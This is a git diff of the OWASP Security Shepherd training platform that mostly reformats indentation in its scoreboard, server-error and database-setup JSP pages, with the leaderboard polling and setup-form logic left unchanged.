-            var fullResponse = new String(ajaxCall.responseText);
-            if (fullResponse.startsWith("ERROR:")) {
-                console.log('Response contained error: ' + fullResponse);
-                $("#badData").html('<center>' + fullResponse + '</center>');
-                $("#badData").show("slow");
-                //Scoreboard will not refresh after this
-                console.log("Scoreboard will not refresh following this error");
-            } else {
-                $("#badData").hide("fast");
-                lastUpdated = new Date().getTime();
-                // play it again, sam (7 secs)
-                t = setTimeout("poll()", 7000);
-            }
-        }
-    }
-
-    //Algorithm from http://tinysort.sjeiti.com/
-    function sort() {
-        var $Ul = $('ul#leaderboard');
-        $Ul.css({position: 'relative', height: $Ul.height(), display: 'block'});
-        var iLnH;
-        var $Li = $('ul#leaderboard>li');
-        $Li.each(function (i, el) {
-            var iY = $(el).position().top;
-            $.data(el, 'h', iY);
-            if (i === 1) iLnH = iY;
-        });
-
-        $Li.tsort('h3:eq(0)', {order: 'asc'}).each(function (i, el) {
-            var $El = $(el);
-            var iFr = $.data(el, 'h');
-            var iTo = i * iLnH;
-            $El.css({position: 'absolute', top: iFr}).animate({top: iTo}, 500);
-        });
-    }
-
-    function fixBoard() {
-        $("#page").width($(window).width() * 0.8);
-        var container = $(window);
-        var content = $('#page');
-        content.css("left", (container.width() - content.width()) / 2);
-    }
-
-    fixBoard();
-
-    $(window).resize(function () {
-        fixBoard();
-    });
-
-    function getGetOrdinal(n) {
-        var s = ["th", "st", "nd", "rd"],
-            v = n % 100;
-        return n + (s[(v - 20) % 10] || s[v] || s[0]);
-    }
-
-    //Kick off Scoreboard
-    poll();
-
-    <%if (userName != null) { %>
-
-    function whereistandToggle() {
-        if ($('#whereistand-chk')[0].checked) {
-            setInterval(function () {
-                    whereistandRefresh();
-                },
-                1000);
-        } else {
-            window.scrollTo(0, 0);
-        }
-    }
-
-    function whereistandRefresh() {
-        if ($('#whereistand-chk')[0].checked) {
-            place = Number($('#userplace-<%=ses.getAttribute("userStamp").toString()%>')[0].innerText.replace(/\D/g, ''));
-            console.log('User is on place ' + place);
-            window.scrollTo(0, $('#header').height());
-
-            var s = Number($('#userplace-<%=ses.getAttribute("userStamp").toString()%>').parent().parent().css('top').replace(/\D/g, ''));
-            var h = $(window).height() / 2;
-            if (s > h) {
-                var d = s - h;
-                window.scrollBy(0, d);
-            }
-        }
-    }
-
-    <% } %>
-</script>
-<%
-    }
-%>
-<%
-    if (Analytics.googleAnalyticsOn) {
-%><%=Analytics.googleAnalyticsScript%>
-<%
-    }
-%>
+	<script type="text/javascript" src="js/jquery.js"></script>
+	<script type="text/javascript" src="js/tinysort.js"></script>
+	<div id="wrapper">
+		<!-- start header -->
+		<div id="header">
+			<h1>Scoreboard</h1>
+			<p>The OWASP Security Shepherd Project</p>
+		</div>
+		<!-- end header -->
+		<!-- start page -->
+		<div id="page">
+			<!-- start content -->
+			<div id="badData"></div>
+			<%
+				if (canSeeScoreboard) {
+			%>
+			<div id="whereistand-div"
+				style="position: fixed; left: 30px; display: none; border-bottom: 3px solid #a878ef; background: #d4d4d4; padding: 5px 5px; border-radius: 5px">
+				<input type="checkbox" id="whereistand-chk"
+					onChange="whereistandToggle()">Where do I stand?
+			</div>
+			<ul id="leaderboard" class="leaderboard"></ul>
+			<%
+				} else {
+			%>
+			<p>Scoreboard is not currently available!</p>
+			<%
+				}
+			%>
+		</div>
+		<!-- end content -->
+		<!-- start sidebar -->
+		<!-- end sidebar -->
+	</div>
+	</div>
+	<!-- end page -->
+	<%
+		if (canSeeScoreboard) {
+	%>
+	<script>
+				var windowIsActive = true;
+
+				window.onfocus = function windowFocus () {
+					windowIsActive = true;
+				};
+
+				window.onblur = function windowBlur () {
+					windowIsActive = false;
+				};
+
+				function timeSince(date) {
+
+				    var seconds = Math.floor((new Date() - date) / 1000);
+
+				    var interval = Math.floor(seconds / 31536000);
+
+				    if (interval > 1) {
+				        return interval + " years";
+				    }
+				    interval = Math.floor(seconds / 2592000);
+				    if (interval > 1) {
+				        return interval + " months";
+				    }
+				    interval = Math.floor(seconds / 86400);
+				    if (interval > 1) {
+				        return interval + " days";
+				    }
+				    interval = Math.floor(seconds / 3600);
+				    if (interval > 1) {
+				        return interval + " hours";
+				    }
+				    interval = Math.floor(seconds / 60);
+				    if (interval > 1) {
+				        return interval + " minutes";
+				    }
+
+				    if (Math.floor(seconds) >= 60) {
+				    	return "1 minute"
+				    }
+				    else {
+				    	return "< 1 minute";
+				    }
+				}
+
+				var lastUpdated = new Date();
+
+				//Scoreboard based on http://mightystuff.net/dynamic-leaderboard
+				function poll() {
+					if(!windowIsActive) { //If Window/Tab is currently not in focus, wait to do the magic
+						console.log ( 'Window not active. Waiting' );
+						$("#badData").html('<center>Scoreboard last updated ' + timeSince(lastUpdated) + ' ago</center>');
+						$("#badData").show("slow");
+						t=setTimeout("poll()", 500); // try again really soon
+					}
+					else { // Window is Active. Do Magic
+						console.log ( 'Window Active. Refreshing' );
+						var ajaxCall = $.ajax({
+							type: "POST",
+							url: 'scoreboard', // needs to return a JSON array of items having the following properties: id, score, username
+							dataType: 'json',
+							data: {
+								csrfToken: "<%=csrfToken%>"
+							},
+							async: false,
+							success: function(o) {
+								$("#badData").hide("fast");
+								for(i=0;i<o.length;i++) {
+									if ($('#userbar-'+ o[i].id).length == 0) {
+										// this id doesn't exist, so add it to our list.
+										var newUser = '<li class="scoreLine"><div id="userbar-'+ o[i].id + '" class="scoreBar" title="' + o[i].userTitle + '" style="width: ' + o[i].scale + '\u0025;">' +
+												'<div id="userplace-'+ o[i].id + '" class="place"><h3 style="display:none;" id="user-' + o[i].id + '">' + o[i].order + '</h3>' + getGetOrdinal(o[i].place) + ': </div>'
+												+ '<div class="scoreName" >'+ o[i].username
+													+ '<div id="goldMedals-' + o[i].id + '" class="medalContainer"><div style="' + o[i].goldDisplay + '"><div class="goldMedalAmountBubble">' + o[i].goldMedalCount + '</div></div></div>'
+													+ '<div id="silverMedals-' + o[i].id + '" class="medalContainer"><div style="' + o[i].silverDisplay + '"><div class="silverMedalAmountBubble">' + o[i].silverMedalCount + '</div></div></div>'
+													+ '<div id="bronzeMedals-' + o[i].id + '" class="medalContainer"><div style="' + o[i].bronzeDisplay + '"><div class="bronzeMedalAmountBubble">' + o[i].bronzeMedalCount + '</div></div></div>'
+												+ '</div><div class="scoreNumber" id="userscore-'+ o[i].id + '">' + o[i].score + '</div></div></li>';
+										$("#leaderboard").append(newUser);
+									} else {
+										// this id does exist
+										//update user elements in the list item.
+										$('#userbar-'+ o[i].id).prop('title', o[i].userTitle);
+										$('#userscore-'+o[i].id).html(o[i].score);
+										$('#userplace-'+o[i].id).html('<h3 style="display:none;" id="user-' + o[i].id + '">' + o[i].order + '</h3>' + getGetOrdinal(o[i].place) + ': ');
+										$('#goldMedals-' + o[i].id).html('<div style="' + o[i].goldDisplay + '"><div class="goldMedalAmountBubble">' + o[i].goldMedalCount + '</div></div></div>');
+										$('#silverMedals-' + o[i].id).html('<div style="' + o[i].silverDisplay + '"><div class="silverMedalAmountBubble">' + o[i].silverMedalCount + '</div></div></div>');
+										$('#bronzeMedals-' + o[i].id).html('<div style="' + o[i].bronzeDisplay + '"><div class="bronzeMedalAmountBubble">' + o[i].bronzeMedalCount + '</div></div></div>');
+										$('#userbar-'+ o[i].id).animate({
+									        width: o[i].scale+"%"
+									    }, 1300 );
+									}
+									<%if (userName != null) {%>
+							// Different color for current user
+									$('#userbar-<%=ses.getAttribute("userStamp").toString()%>').css('background-color', 'green');
+									
+									<%}%>
+								}
+								sort();
+
+								<%if (userName != null) {%>
+								// Show/hide Where I stand button
+								if ($('#userbar-<%=ses.getAttribute("userStamp").toString()%>').length == 0)
+									$("#whereistand-div").hide();
+								else
+									$("#whereistand-div").show();
+								<%}%>
+							}
+						});
+						var fullResponse = new String(ajaxCall.responseText);
+						if (fullResponse.startsWith("ERROR:")) {
+							console.log ('Response contained error: ' + fullResponse);
+							$("#badData").html('<center>' + fullResponse + '</center>');
+							$("#badData").show("slow");
+							//Scoreboard will not refresh after this
+							console.log("Scoreboard will not refresh following this error");
+						} else {
+							$("#badData").hide("fast");
+							lastUpdated = new Date().getTime();
+							// play it again, sam (7 secs)
+							t=setTimeout("poll()",7000);
+						}
+					}
+				}
+
+				//Algorithm from http://tinysort.sjeiti.com/
+				function sort() {
+					var $Ul = $('ul#leaderboard');
+					$Ul.css({position:'relative',height:$Ul.height(),display:'block'});
+					var iLnH;
+					var $Li = $('ul#leaderboard>li');
+					$Li.each(function(i,el){
+						var iY = $(el).position().top;
+						$.data(el,'h',iY);
+						if (i===1) iLnH = iY;
+					});
+
+					$Li.tsort('h3:eq(0)',{order:'asc'}).each(function(i,el){
+						var $El = $(el);
+						var iFr = $.data(el,'h');
+						var iTo = i*iLnH;
+						$El.css({position:'absolute',top:iFr}).animate({top:iTo},500);
+					});
+				}
+
+				function fixBoard(){
+					$("#page").width($(window).width()*0.8);
+					var container = $(window);
+					var content = $('#page');
+					content.css("left", (container.width()-content.width())/2);
+				}
+
+				fixBoard();
+
+				$(window).resize(function()
+				{
+					fixBoard();
+				});
+
+				function getGetOrdinal(n) {
+				   var s=["th","st","nd","rd"],
+					   v=n%100;
+				   return n+(s[(v-20)%10]||s[v]||s[0]);
+				}
+				//Kick off Scoreboard
+				poll();
+
+				<%if (userName != null) { %>
+				
+				function whereistandToggle() {
+					if ($('#whereistand-chk')[0].checked)
+						{
+						setInterval(function() {
+							whereistandRefresh();
+							}, 
+							1000);
+						}
+					else{
+						window.scrollTo(0, 0);
+					}
+				}
+
+				function whereistandRefresh() {
+					if ($('#whereistand-chk')[0].checked) {
+						place = Number($('#userplace-<%=ses.getAttribute("userStamp").toString()%>')[0].innerText.replace(/\D/g, ''));
+						console.log('User is on place ' + place);
+						window.scrollTo(0, $('#header').height());
+
+						var s = Number($('#userplace-<%=ses.getAttribute("userStamp").toString()%>').parent().parent().css('top').replace(/\D/g, ''));
+						var h = $(window).height() / 2;
+						if (s > h) {
+							var d = s - h;
+							window.scrollBy(0, d);
+						}
+						}
+				}
+				<% } %>
+	</script>
+	<%
+		}
+	%>
+	<%
+		if (Analytics.googleAnalyticsOn) {
+	%><%=Analytics.googleAnalyticsScript%>
+	<%
+		}
+	%>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("login.jsp");
-        }
-    } else {
-        response.sendRedirect("login.jsp");
-    }
+	} else {
+			response.sendRedirect("login.jsp");
+		}
+	} else {
+		response.sendRedirect("login.jsp");
+	}
 %>
diff --git a/src/main/webapp/serverError.jsp b/src/main/webapp/serverError.jsp
index 3ebfb82e9..0195f572c 100644
--- a/src/main/webapp/serverError.jsp
+++ b/src/main/webapp/serverError.jsp
@@ -1,8 +1,8 @@
 <head>
-    <title>Server Error</title>
+<title>Server Error</title>
 </head>
 <body>
-<h1>Server Error</h1>
-<img
-        src="${pageContext.request.contextPath}/css/images/serverError.jpg"/>
+	<h1>Server Error</h1>
+	<img
+		src="${pageContext.request.contextPath}/css/images/serverError.jpg" />
 </body>
\ No newline at end of file
diff --git a/src/main/webapp/setup.jsp b/src/main/webapp/setup.jsp
index ca9523e1c..131ef7e4d 100644
--- a/src/main/webapp/setup.jsp
+++ b/src/main/webapp/setup.jsp
@@ -1,500 +1,500 @@
-<%@page import="dbProcs.Constants" %>
-<%@page import="servlets.Setup" %>
+<%@page import="dbProcs.Constants"%>
+<%@page import="servlets.Setup"%>
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="utils.*, java.util.Properties, org.owasp.encoder.Encode" %>
-<%@ include file="translation.jsp" %>
+	language="java"
+	import="utils.*, java.util.Properties, org.owasp.encoder.Encode"%>
+<%@ include file="translation.jsp"%>
 
 <%
-    /**
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+	/**
+	 * This file is part of the Security Shepherd Project.
+	 * 
+	 * The Security Shepherd project is free software: you can redistribute it and/or modify
+	 * it under the terms of the GNU General Public License as published by
+	 * the Free Software Foundation, either version 3 of the License, or
+	 * (at your option) any later version.<br/>
+	 * 
+	 * The Security Shepherd project is distributed in the hope that it will be useful,
+	 * but WITHOUT ANY WARRANTY; without even the implied warranty of
+	 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	 * GNU General Public License for more details.<br/>
+	 * 
+	 * You should have received a copy of the GNU General Public License
+	 * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+	 * 
+	 * @author Mark Denihan
+	 */
 
-    HttpSession ses = request.getSession();
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
-            "Sombody (" + ses.getAttribute("lang") + ") Conntected to login.jsp ...");
-    String error = "";
-    boolean hasDBFile = false;
-    Properties mysql_props;
+	HttpSession ses = request.getSession();
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+			"Sombody (" + ses.getAttribute("lang") + ") Conntected to login.jsp ...");
+	String error = "";
+	boolean hasDBFile = false;
+	Properties mysql_props;
 
-    if (ses.getAttribute("dbConnectionFailed") != null) {
-        error = ses.getAttribute("dbConnectionFailed").toString();
-        ses.removeAttribute("dbConnectionFailed");
-    }
+	if (ses.getAttribute("dbConnectionFailed") != null) {
+		error = ses.getAttribute("dbConnectionFailed").toString();
+		ses.removeAttribute("dbConnectionFailed");
+	}
 
-    if (ses.getAttribute("dbAuthFailed") != null) {
-        error = ses.getAttribute("dbAuthFailed").toString();
-        ses.removeAttribute("dbAuthFailed");
-    }
+	if (ses.getAttribute("dbAuthFailed") != null) {
+		error = ses.getAttribute("dbAuthFailed").toString();
+		ses.removeAttribute("dbAuthFailed");
+	}
 
-    if (ses.getAttribute("dbSetupFailed") != null) {
-        error = ses.getAttribute("dbSetupFailed").toString();
-        ses.removeAttribute("dbSetupFailed");
-    }
+	if (ses.getAttribute("dbSetupFailed") != null) {
+		error = ses.getAttribute("dbSetupFailed").toString();
+		ses.removeAttribute("dbSetupFailed");
+	}
 
-    if (Setup.isInstalled()) {
-        response.sendRedirect("login.jsp");
-    } else {
-        mysql_props = Setup.getDBProps();
+	if (Setup.isInstalled()) {
+		response.sendRedirect("login.jsp");
+	} else {
+		mysql_props = Setup.getDBProps();
 
-        if (mysql_props != null) {
-            hasDBFile = true;
+		if (mysql_props != null) {
+			hasDBFile = true;
 
-            String connectionURL = mysql_props.getProperty("databaseConnectionURL");
-            if (connectionURL == null) {
-                hasDBFile = false;
-            }
-            String databaseSchema = mysql_props.getProperty("databaseSchema");
-            if (databaseSchema == null) {
-                hasDBFile = false;
+			String connectionURL = mysql_props.getProperty("databaseConnectionURL");
+			if (connectionURL == null) {
+				hasDBFile = false;
+			}
+			String databaseSchema = mysql_props.getProperty("databaseSchema");
+			if (databaseSchema == null) {
+				hasDBFile = false;
 
-            }
-            String dbOptions = mysql_props.getProperty("databaseOptions");
-            if (dbOptions == null) {
-                hasDBFile = false;
+			}
+			String dbOptions = mysql_props.getProperty("databaseOptions");
+			if (dbOptions == null) {
+				hasDBFile = false;
 
-            }
-            String driverType = mysql_props.getProperty("DriverType");
-            if (driverType == null) {
-                hasDBFile = false;
+			}
+			String driverType = mysql_props.getProperty("DriverType");
+			if (driverType == null) {
+				hasDBFile = false;
 
-            }
-            String username = mysql_props.getProperty("databaseUsername");
-            if (username == null) {
-                hasDBFile = false;
+			}
+			String username = mysql_props.getProperty("databaseUsername");
+			if (username == null) {
+				hasDBFile = false;
 
-            }
-            String password = mysql_props.getProperty("databasePassword");
-            if (password == null) {
-                hasDBFile = false;
+			}
+			String password = mysql_props.getProperty("databasePassword");
+			if (password == null) {
+				hasDBFile = false;
 
-            }
+			}
 
-        }
+		}
 
-    }
+	}
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <title>OWASP Security Shepherd - Login</title>
+<title>OWASP Security Shepherd - Login</title>
 
-    <link href="css/theCss.css" rel="stylesheet" type="text/css"
-          media="screen"/>
-    <link href="css/theResponsiveCss.css" rel="stylesheet" type="text/css"
-          media="screen">
+<link href="css/theCss.css" rel="stylesheet" type="text/css"
+	media="screen" />
+<link href="css/theResponsiveCss.css" rel="stylesheet" type="text/css"
+	media="screen">
 </head>
 <body>
-<script type="text/javascript" src="js/jquery.js"></script>
-<script type="text/javascript" src="js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="js/clipboard-js/clipboard-events.js"></script>
-<div id="wrapper">
-    <jsp:include page="translation-select.jsp"/>
-    <!-- start header -->
-    <div id="header">
-        <h1>Security Shepherd</h1>
-    </div>
-    <!-- end header -->
-    <!-- start page -->
-    <div id="page">
-        <!-- start content -->
-        <div id="content">
-            <div class="setupPage">
-                <h1 class="title" id="login_title">
-                    <fmt:message key="generic.text.setup.title"/>
-                </h1>
-                <p>
-                    <fmt:message key="generic.text.setup.description"/>
-                </p>
-                <h2 class="title" id="login_title">
-                    <fmt:message key="generic.text.setup.token.title"/>
-                </h2>
-                <p>
-                    <fmt:message key="generic.text.setup.token.description"/>
-                </p>
-                <script>
-                    prepTooltips();
-                    prepClipboardEvents();
-                </script>
-                <div class='input-group' style="margin-bottom: 15px;">
+	<script type="text/javascript" src="js/jquery.js"></script>
+	<script type="text/javascript" src="js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="js/clipboard-js/clipboard-events.js"></script>
+	<div id="wrapper">
+		<jsp:include page="translation-select.jsp" />
+		<!-- start header -->
+		<div id="header">
+			<h1>Security Shepherd</h1>
+		</div>
+		<!-- end header -->
+		<!-- start page -->
+		<div id="page">
+			<!-- start content -->
+			<div id="content">
+				<div class="setupPage">
+					<h1 class="title" id="login_title">
+						<fmt:message key="generic.text.setup.title" />
+					</h1>
+					<p>
+						<fmt:message key="generic.text.setup.description" />
+					</p>
+					<h2 class="title" id="login_title">
+						<fmt:message key="generic.text.setup.token.title" />
+					</h2>
+					<p>
+						<fmt:message key="generic.text.setup.token.description" />
+					</p>
+					<script>
+						prepTooltips();
+						prepClipboardEvents();
+					</script>
+					<div class='input-group' style="margin-bottom: 15px;">
 						<textarea id='theKey'
-                                  style="font-size: 12px; padding: 0.1em; height: 30px; display: inline-block; float: left; padding-right: 1em; overflow: hidden; width: 95%"><%=Constants.SETUP_AUTH%></textarea>
-                    <span class='input-group-button'>
+							style="font-size: 12px; padding: 0.1em; height: 30px; display: inline-block; float: left; padding-right: 1em; overflow: hidden; width: 95%"><%=Constants.SETUP_AUTH%></textarea>
+						<span class='input-group-button'>
 							<button class='btn' type='button' data-clipboard-shepherd
-                                    data-clipboard-target='#theKey' style='height: 30px;'>
+								data-clipboard-target='#theKey' style='height: 30px;'>
 								<img src='js/clipboard-js/clippy.svg' width='14'
-                                     alt='<fmt:message key="generic.text.copy.to.clip"/>'>
+									alt='<fmt:message key="generic.text.copy.to.clip"/>'>
 							</button>
 						</span>
-                </div>
-                <h2 class="title" id="login_title">
-                    <fmt:message key="generic.text.setup.form.title"/>
-                </h2>
-                <form id="setupForm" action="javascript:;">
-                    <div class="row">
-                        <div class="col-25">
-                            <label for="dbhost"><fmt:message
-                                    key="generic.text.setup.host"/></label>
-                        </div>
-                        <div class="col-75">
-                            <%
-                                if (hasDBFile) {
-                            %>
-                            <input type="text" id="dbhost" name="dbhost"
-                                   placeholder="(unchanged)">
-                            <%
-                            } else {
-                            %>
-                            <input type="text" id="dbhost" name="dbhost"
-                                   placeholder="Database Hostname..." autofocus required>
-                            <%
-                                }
-                            %>
-                        </div>
-                    </div>
-                    <div class="row">
-                        <div class="col-25">
-                            <label for="dbport"><fmt:message
-                                    key="generic.text.setup.port"/></label>
-                        </div>
-                        <div class="col-75">
-                            <%
-                                if (hasDBFile) {
-                            %>
-                            <input type="text" id="dbport" name="dbport"
-                                   placeholder="(unchanged)">
-                            <%
-                            } else {
-                            %>
-                            <input type="text" id="dbport" name="dbport"
-                                   placeholder="Database Port..." required>
-                            <%
-                                }
-                            %>
-                        </div>
-                    </div>
-                    <div class="row">
-                        <div class="col-25">
-                            <label for="dbuser"><fmt:message
-                                    key="generic.text.setup.user"/></label>
-                        </div>
-                        <div class="col-75">
+					</div>
+					<h2 class="title" id="login_title">
+						<fmt:message key="generic.text.setup.form.title" />
+					</h2>
+					<form id="setupForm" action="javascript:;">
+						<div class="row">
+							<div class="col-25">
+								<label for="dbhost"><fmt:message
+										key="generic.text.setup.host" /></label>
+							</div>
+							<div class="col-75">
+								<%
+									if (hasDBFile) {
+								%>
+								<input type="text" id="dbhost" name="dbhost"
+									placeholder="(unchanged)">
+								<%
+									} else {
+								%>
+								<input type="text" id="dbhost" name="dbhost"
+									placeholder="Database Hostname..." autofocus required>
+								<%
+									}
+								%>
+							</div>
+						</div>
+						<div class="row">
+							<div class="col-25">
+								<label for="dbport"><fmt:message
+										key="generic.text.setup.port" /></label>
+							</div>
+							<div class="col-75">
+								<%
+									if (hasDBFile) {
+								%>
+								<input type="text" id="dbport" name="dbport"
+									placeholder="(unchanged)">
+								<%
+									} else {
+								%>
+								<input type="text" id="dbport" name="dbport"
+									placeholder="Database Port..." required>
+								<%
+									}
+								%>
+							</div>
+						</div>
+						<div class="row">
+							<div class="col-25">
+								<label for="dbuser"><fmt:message
+										key="generic.text.setup.user" /></label>
+							</div>
+							<div class="col-75">
 
-                            <%
-                                if (hasDBFile) {
-                            %>
-                            <input type="text" id="dbuser" name="dbuser"
-                                   placeholder="(unchanged)">
-                            <%
-                            } else {
-                            %>
-                            <input type="text" id="dbuser" name="dbuser"
-                                   placeholder="Database Port..." required>
-                            <%
-                                }
-                            %>
-                        </div>
-                    </div>
-                    <div class="row">
-                        <div class="col-25">
-                            <label for="dbpass"><fmt:message
-                                    key="generic.text.setup.pwd"/></label>
-                        </div>
-                        <div class="col-75">
+								<%
+									if (hasDBFile) {
+								%>
+								<input type="text" id="dbuser" name="dbuser"
+									placeholder="(unchanged)">
+								<%
+									} else {
+								%>
+								<input type="text" id="dbuser" name="dbuser"
+									placeholder="Database Port..." required>
+								<%
+									}
+								%>
+							</div>
+						</div>
+						<div class="row">
+							<div class="col-25">
+								<label for="dbpass"><fmt:message
+										key="generic.text.setup.pwd" /></label>
+							</div>
+							<div class="col-75">
 
-                            <%
-                                if (hasDBFile) {
-                            %>
-                            <input type="password" id="dbpass" name="dbpass"
-                                   placeholder="(unchanged)">
-                            <%
-                            } else {
-                            %>
-                            <input type="password" id="dbpass" name="dbpass"
-                                   placeholder="Database Port..." required>
-                            <%
-                                }
-                            %>
-                        </div>
-                    </div>
-                    <div class="row">
-                        <div class="col-25">
-                            <label for="dboverride"><fmt:message
-                                    key="generic.text.setup.overridedb"/></label>
-                        </div>
-                        <div class="col-75">
-                            <select id="dboverride" name="dboverride">
-                                <option value="override"><fmt:message
-                                        key="generic.text.setup.wipe"/></option>
-                                <option value="upgrade"><fmt:message
-                                        key="generic.text.setup.upgrade"/></option>
-                                <option value="false"><fmt:message
-                                        key="generic.text.setup.dontwipe"/></option>
-                            </select>
-                        </div>
-                    </div>
-                    <div class="row">
-                        <div class="col-25">
-                            <label for="dbauth"><fmt:message
-                                    key="generic.text.setup.authentication"/></label>
-                        </div>
-                        <div class="col-75">
-                            <input type="text" id="dbauth" name="dbauth"
-                                   placeholder="Token from Server File System..." required>
-                        </div>
-                    </div>
-                    <!-- MongoDb / NoSQL level -->
-                    <script>
-                        function uncheck() {
-                            $('#enableMongoChallenge')
-                                .removeAttr('checked');
-                        }
+								<%
+									if (hasDBFile) {
+								%>
+								<input type="password" id="dbpass" name="dbpass"
+									placeholder="(unchanged)">
+								<%
+									} else {
+								%>
+								<input type="password" id="dbpass" name="dbpass"
+									placeholder="Database Port..." required>
+								<%
+									}
+								%>
+							</div>
+						</div>
+						<div class="row">
+							<div class="col-25">
+								<label for="dboverride"><fmt:message
+										key="generic.text.setup.overridedb" /></label>
+							</div>
+							<div class="col-75">
+								<select id="dboverride" name="dboverride">
+									<option value="override"><fmt:message
+											key="generic.text.setup.wipe" /></option>
+									<option value="upgrade"><fmt:message
+											key="generic.text.setup.upgrade" /></option>
+									<option value="false"><fmt:message
+											key="generic.text.setup.dontwipe" /></option>
+								</select>
+							</div>
+						</div>
+						<div class="row">
+							<div class="col-25">
+								<label for="dbauth"><fmt:message
+										key="generic.text.setup.authentication" /></label>
+							</div>
+							<div class="col-75">
+								<input type="text" id="dbauth" name="dbauth"
+									placeholder="Token from Server File System..." required>
+							</div>
+						</div>
+						<!-- MongoDb / NoSQL level -->
+						<script>
+							function uncheck() {
+								$('#enableMongoChallenge')
+										.removeAttr('checked');
+							}
 
-                        $(document)
-                            .ready(
-                                function () {
-                                    $('#enableMongoChallenge')
-                                        .change(
-                                            function () {
-                                                if (this.checked) {
-                                                    $(
-                                                        '#showHideDiv')
-                                                        .fadeIn(
-                                                            'slow');
-                                                    $(
-                                                        '#enableMongoChallenge')
-                                                        .val(
-                                                            "enable");
-                                                    $(
-                                                        "#mhost")
-                                                        .prop(
-                                                            'required',
-                                                            true);
-                                                    $(
-                                                        "#mport")
-                                                        .prop(
-                                                            'required',
-                                                            true);
-                                                } else {
-                                                    $(
-                                                        '#showHideDiv')
-                                                        .fadeOut(
-                                                            'slow');
-                                                    $(
-                                                        '#enableMongoChallenge')
-                                                        .val(
-                                                            "off");
-                                                    $(
-                                                        "#mhost")
-                                                        .prop(
-                                                            'required',
-                                                            false);
-                                                    $(
-                                                        "#mport")
-                                                        .prop(
-                                                            'required',
-                                                            false);
-                                                }
-                                            });
-                                });
-                    </script>
-                    <div class="row">
-                        <div class="col-25">
+							$(document)
+									.ready(
+											function() {
+												$('#enableMongoChallenge')
+														.change(
+																function() {
+																	if (this.checked) {
+																		$(
+																				'#showHideDiv')
+																				.fadeIn(
+																						'slow');
+																		$(
+																				'#enableMongoChallenge')
+																				.val(
+																						"enable");
+																		$(
+																				"#mhost")
+																				.prop(
+																						'required',
+																						true);
+																		$(
+																				"#mport")
+																				.prop(
+																						'required',
+																						true);
+																	} else {
+																		$(
+																				'#showHideDiv')
+																				.fadeOut(
+																						'slow');
+																		$(
+																				'#enableMongoChallenge')
+																				.val(
+																						"off");
+																		$(
+																				"#mhost")
+																				.prop(
+																						'required',
+																						false);
+																		$(
+																				"#mport")
+																				.prop(
+																						'required',
+																						false);
+																	}
+																});
+											});
+						</script>
+						<div class="row">
+							<div class="col-25">
 								<span><fmt:message
-                                        key="generic.text.setup.enable.mongodb"/></span>
-                        </div>
-                        <div class="col-75">
-                            <input type="checkbox" id="enableMongoChallenge"
-                                   name="enableMongoChallenge" value="">
-                        </div>
-                    </div>
-                    <div id="showHideDiv" style="display: none">
-                        <div class="row">
-                            <div class="col-25">
-                                <label for="mhost">MongoDb <fmt:message
-                                        key="generic.text.setup.host"/></label>
-                            </div>
-                            <div class="col-75">
-                                <input type="text" id="mhost" name="mhost"
-                                       placeholder="Mongo Host...">
-                            </div>
-                        </div>
-                        <div class="row">
-                            <div class="col-25">
-                                <label for="mport">MongoDb <fmt:message
-                                        key="generic.text.setup.port"/></label>
-                            </div>
-                            <div class="col-75">
-                                <input type="text" id="mport" name="mport"
-                                       placeholder="Mongo Port...">
-                            </div>
-                        </div>
-                    </div>
+										key="generic.text.setup.enable.mongodb" /></span>
+							</div>
+							<div class="col-75">
+								<input type="checkbox" id="enableMongoChallenge"
+									name="enableMongoChallenge" value="">
+							</div>
+						</div>
+						<div id="showHideDiv" style="display: none">
+							<div class="row">
+								<div class="col-25">
+									<label for="mhost">MongoDb <fmt:message
+											key="generic.text.setup.host" /></label>
+								</div>
+								<div class="col-75">
+									<input type="text" id="mhost" name="mhost"
+										placeholder="Mongo Host...">
+								</div>
+							</div>
+							<div class="row">
+								<div class="col-25">
+									<label for="mport">MongoDb <fmt:message
+											key="generic.text.setup.port" /></label>
+								</div>
+								<div class="col-75">
+									<input type="text" id="mport" name="mport"
+										placeholder="Mongo Port...">
+								</div>
+							</div>
+						</div>
 
-                    <script>
-                        function uncheckUnfafe() {
-                            $('#unsafeLevels').removeAttr('checked');
-                        }
+						<script>
+							function uncheckUnfafe() {
+								$('#unsafeLevels').removeAttr('checked');
+							}
 
-                        $(document).ready(function () {
-                            $('#unsafeLevels').change(function () {
-                                if (this.checked) {
-                                    $('#showHideWarning').fadeIn('slow');
-                                    $('#unsafeLevels').val("enable");
-                                } else {
-                                    $('#showHideWarning').fadeOut('slow');
-                                    $('#unsafeLevels').val("disable");
-                                }
-                            });
-                        });
-                    </script>
+							$(document).ready(function() {
+								$('#unsafeLevels').change(function() {
+									if (this.checked) {
+										$('#showHideWarning').fadeIn('slow');
+										$('#unsafeLevels').val("enable");
+									} else {
+										$('#showHideWarning').fadeOut('slow');
+										$('#unsafeLevels').val("disable");
+									}
+								});
+							});
+						</script>
 
-                    <div class="row">
-                        <div class="col-25">
-                            <label for="mhost"><fmt:message
-                                    key="generic.text.setup.enable.unsafe"/></label>
-                        </div>
-                        <div class="col-75">
-                            <input type="checkbox" id="unsafeLevels" name="unsafeLevels"
-                                   value=""> <span id="showHideWarning"
-                                                   style="display: none"> <fmt:message
